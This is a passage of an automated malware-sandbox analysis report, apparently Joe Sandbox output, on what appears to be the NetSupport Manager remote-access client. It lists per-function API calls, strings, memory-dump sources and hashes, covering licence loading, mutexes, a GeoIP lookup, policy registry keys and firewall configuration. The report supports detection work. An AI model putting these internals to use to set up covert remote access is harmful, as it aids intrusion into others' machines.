3044 1113903e-11139049 IsWindowVisible 3041->3044 3043->3037 3052 11138f9c-11138fb4 GetForegroundWindow IsWindowVisible 3043->3052 3044->3037 3047 1113904b-1113906d EnableWindow call 11131210 EnableWindow 3044->3047 3045->3021 3047->3037 3054 11138fc1-11138fcd call 11131210 3052->3054 3055 11138fb6-11138fbf EnableWindow 3052->3055 3058 11138fcf-11138fd5 3054->3058 3059 11138fde-11138ffb EnableWindow call 11161d01 3054->3059 3055->3054 3058->3059 3060 11138fd7-11138fd8 SetForegroundWindow 3058->3060 3060->3059
                                                                                        APIs
                                                                                          • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                          • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                          • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                          • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                        • PostMessageA.USER32(0002043C,000006CF,00000007,00000000), ref: 11138E0F
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • SetWindowTextA.USER32(0002043C,00000000), ref: 11138EB7
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11138F7C
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11138FAA
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                        • EnableWindow.USER32(0002043C,00000001), ref: 11138FE7
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11139038
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11139045
                                                                                        • EnableWindow.USER32(0002043C,00000000), ref: 11139059
                                                                                        • EnableWindow.USER32(0002043C,00000000), ref: 11138FBF
                                                                                          • Part of subcall function 11131210: ShowWindow.USER32(0002043C,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                        • EnableWindow.USER32(0002043C,00000001), ref: 1113906D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                        • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                        • API String ID: 3453649892-3803836183
                                                                                        • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                        • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                        • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                        • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                        Function 110281A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                          • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        • wsprintfA.USER32 ref: 11028214
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                        • wsprintfA.USER32 ref: 11028291
                                                                                        • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                        • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                        • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                        • API String ID: 512045693-419896573
                                                                                        • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                        • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                        • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                        • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                        Function 11085E10 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL,1B492F88,02E180C8,02E180B8,?,00000000,1118276C,000000FF,?,11031942,02E180C8,00000000,?,?,?), ref: 11085E45
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                        • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                        • wsprintfA.USER32 ref: 11085F1B
                                                                                        • wsprintfA.USER32 ref: 11085F32
                                                                                        • wsprintfA.USER32 ref: 11085F49
                                                                                        • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02E180C8,00000000,?,?,?), ref: 11085A98
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02E180C8,00000000,?,?,?), ref: 11085AAB
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02E180C8,00000000,?,?,?), ref: 11085ABE
                                                                                          • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,02E180C8,00000000,?,?,?), ref: 11085AD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                        • API String ID: 4263811268-2492245516
                                                                                        • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                        • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                        • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                        • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                        Function 110304B8 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                        • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                        • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                        • API String ID: 2061479752-1320826866
                                                                                        • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                        • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                        • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                        • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                        Function 1102C410 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                        • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                          • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                        • GetTickCount.KERNEL32 ref: 1102C574
                                                                                          • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                          • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                        • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                        • API String ID: 596640303-1725438197
                                                                                        • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                        • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                        • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                        • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                        Function 11061700 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                          • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                          • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Enum$Open$CloseValue
                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                        • API String ID: 2823542970-1528906934
                                                                                        • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                        • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                        • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                        • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                        Function 11137630 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • GetTickCount.KERNEL32 ref: 11137692
                                                                                          • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                          • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                          • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                          • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                        • GetTickCount.KERNEL32 ref: 111376A1
                                                                                        • _memset.LIBCMT ref: 111376E3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                        • _strrchr.LIBCMT ref: 11137708
                                                                                        • _free.LIBCMT ref: 1113775A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                        • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                        • API String ID: 711243594-1270230032
                                                                                        • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                        • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                        • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                        • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                        Function 11133E80 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                          • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                          • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                          • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                          • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                          • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                        • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                        • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                        • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                        • GetDC.USER32(00000000), ref: 11133F03
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                        • CreateWindowExA.USER32(00000001,NSMWClass,02E00138,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
